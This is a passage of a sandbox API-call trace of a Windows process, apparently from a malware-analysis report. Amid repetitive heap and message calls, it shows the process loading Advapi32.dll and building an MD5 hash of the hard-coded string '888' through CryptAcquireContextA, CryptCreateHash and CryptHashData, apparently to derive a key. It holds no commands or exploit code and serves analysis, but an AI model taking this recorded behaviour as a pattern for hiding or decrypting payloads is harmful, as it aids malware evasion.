out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.303] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.304] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.304] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.305] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.305] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.305] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.305] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0090.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0090.305] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.305] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.305] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.305] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.305] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.305] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0090.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7160, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.306] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0090.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.306] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0090.306] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.306] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0090.306] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.306] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.306] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.307] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.307] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.307] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.307] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.307] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.308] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.308] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.308] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.308] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.308] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.308] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.308] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.308] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.308] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.308] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.308] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.308] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.308] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.308] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.308] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.309] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.309] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.309] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.309] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.309] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9e08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.309] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0090.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.309] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0090.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0090.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0090.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.309] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.309] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.319] CryptHashData (hHash=0x9a4200, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0090.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.319] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.319] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.320] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, 